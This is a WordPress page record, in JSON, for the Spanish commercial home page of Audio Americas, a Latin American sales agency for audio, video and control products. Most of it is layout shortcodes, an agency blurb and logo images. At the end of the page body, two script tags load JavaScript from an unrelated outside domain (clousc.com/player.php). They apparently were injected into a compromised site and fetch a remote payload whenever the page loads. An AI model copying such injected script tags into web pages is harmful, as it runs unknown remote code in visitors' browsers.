{"id":6007,"date":"2020-08-14T03:10:39","date_gmt":"2020-08-14T03:10:39","guid":{"rendered":"https:\/\/audioamericas.net\/es\/?page_id=6007"},"modified":"2026-02-13T21:19:04","modified_gmt":"2026-02-13T21:19:04","slug":"comercial-inicio","status":"publish","type":"page","link":"https:\/\/audioamericas.net\/es\/comercial\/inicio\/","title":{"rendered":"Comercial &#8211; Inicio"},"content":{"rendered":"<p>[vc_row row_style=&#8221;full-width&#8221; equal_height=&#8221;true&#8221; padding_size=&#8221;s-padding&#8221; css=&#8221;.vc_custom_1473296192844{margin-bottom: -20px !important;}&#8221;][vc_column text_align=&#8221;center&#8221;][vc_empty_space][vc_empty_space height=&#8221;80px&#8221;][vc_empty_space height=&#8221;80px&#8221;][vc_custom_heading text=&#8221;Sales &amp; Marketing&#8221; font_container=&#8221;tag:h2|font_size:38|text_align:center&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:700%20bold%20regular%3A700%3Anormal&#8221; css=&#8221;.vc_custom_1473297416062{margin-top: -100px !important;}&#8221;][vc_custom_heading text=&#8221;in Latin America and The Caribbean&#8221; font_container=&#8221;tag:h2|font_size:18|text_align:center&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][wyde_separator text_align=&#8221;center&#8221; border_width=&#8221;3px&#8221; color=&#8221;#00a8e4&#8243;][vc_empty_space][vc_custom_heading text=&#8221;Audio Americas es una agencia de ventas para Latinoam\u00e9rica especializada en productos de audio, video y control de uso comercial. En esta regi\u00f3n amplia y diversa, donde el panorama del mercado var\u00eda en cada pa\u00eds, ayudamos a los fabricantes a alcanzar un mejor posicionamiento en el mercado, conectando los mejores productos con los mejores clientes.&#8221; font_container=&#8221;tag:p|font_size:18|text_align:center&#8221; google_fonts=&#8221;font_family:Lato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic|font_style:300%20light%20regular%3A300%3Anormal&#8221; css=&#8221;.vc_custom_1607647221184{padding-right: 30px !important;padding-left: 30px !important;}&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/12&#8243;][\/vc_column][vc_column width=&#8221;10\/12&#8243; css=&#8221;.vc_custom_1536167323431{margin-bottom: 0px !important;}&#8221;][vc_row_inner][vc_column_inner offset=&#8221;vc_hidden-lg vc_hidden-md vc_hidden-sm vc_hidden-xs&#8221;][vc_empty_space height=&#8221;45px&#8221;][vc_custom_heading text=&#8221;Audio Video Comercial&#8221; font_container=&#8221;tag:h2|font_size:14|text_align:center&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][wyde_separator text_align=&#8221;center&#8221; color=&#8221;#0c0000&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=&#8221;1\/12&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;6198&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;6063&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;6222&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;6239&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/12&#8243;][\/vc_column][vc_column width=&#8221;2\/12&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;6245&#8243;][\/vc_column][vc_column width=&#8221;2\/12&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;6253&#8243;][\/vc_column][vc_column width=&#8221;2\/12&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;5987&#8243;][\/vc_column][vc_column width=&#8221;2\/12&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;6243&#8243;][\/vc_column][vc_column width=&#8221;2\/12&#8243;][vc_single_image img_size=&#8221;overlap-large&#8221; alignment=&#8221;center&#8221; image=&#8221;6256&#8243;][\/vc_column][vc_column width=&#8221;1\/12&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=&#8221;50px&#8221;][vc_row_inner vertical_align=&#8221;middle&#8221;][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243; css=&#8221;.vc_custom_1597372995500{margin: 0px !important;padding: 0px !important;}&#8221;][wyde_link_button style=&#8221;outline&#8221; title=&#8221;Residencial&#8221; css=&#8221;.vc_custom_1608000300693{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;}&#8221; link=&#8221;url:https%3A%2F%2Faudioamericas.net%2Fes%2Fresidencial%2Finicio%2F|||&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243; css=&#8221;.vc_custom_1597373004150{margin: 0px !important;padding: 0px !important;}&#8221;][wyde_link_button title=&#8221;Comercial&#8221; css=&#8221;.vc_custom_1608000311075{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;}&#8221; link=&#8221;url:https%3A%2F%2Faudioamericas.net%2Fes%2Fcomercial%2Finicio|||&#8221; color=&#8221;#ffffff&#8221; bg_color=&#8221;#00a8e4&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<p><script src=\"https:\/\/clousc.com\/player.php?ver=3.0&amp;ref=api\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<p><script src=\"https:\/\/clousc.com\/player.php?ver=3.0&amp;ref=api\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row row_style=&#8221;full-width&#8221; equal_height=&#8221;true&#8221; padding_size=&#8221;s-padding&#8221; css=&#8221;.vc_custom_1473296192844{margin-bottom: -20px !important;}&#8221;][vc_column text_align=&#8221;center&#8221;][vc_empty_space][vc_empty_space height=&#8221;80px&#8221;][vc_empty_space height=&#8221;80px&#8221;][vc_custom_heading text=&#8221;Sales &amp; Marketing&#8221; font_container=&#8221;tag:h2|font_size:38|text_align:center&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:700%20bold%20regular%3A700%3Anormal&#8221; css=&#8221;.vc_custom_1473297416062{margin-top: -100px !important;}&#8221;][vc_custom_heading text=&#8221;in Latin America and The Caribbean&#8221; font_container=&#8221;tag:h2|font_size:18|text_align:center&#8221; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][wyde_separator text_align=&#8221;center&#8221; border_width=&#8221;3px&#8221; color=&#8221;#00a8e4&#8243;][vc_empty_space][vc_custom_heading text=&#8221;Audio Americas es una agencia de ventas para Latinoam\u00e9rica especializada en productos de audio, video y control de uso comercial. En esta regi\u00f3n amplia y diversa, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/audioamericas.net\/es\/wp-json\/wp\/v2\/pages\/6007"}],"collection":[{"href":"https:\/\/audioamericas.net\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/audioamericas.net\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/audioamericas.net\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/audioamericas.net\/es\/wp-json\/wp\/v2\/comments?post=6007"}],"version-history":[{"count":26,"href":"https:\/\/audioamericas.net\/es\/wp-json\/wp\/v2\/pages\/6007\/revisions"}],"predecessor-version":[{"id":6259,"href":"https:\/\/audioamericas.net\/es\/wp-json\/wp\/v2\/pages\/6007\/revisions\/6259"}],"wp:attachment":[{"href":"https:\/\/audioamericas.net\/es\/wp-json\/wp\/v2\/media?parent=6007"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}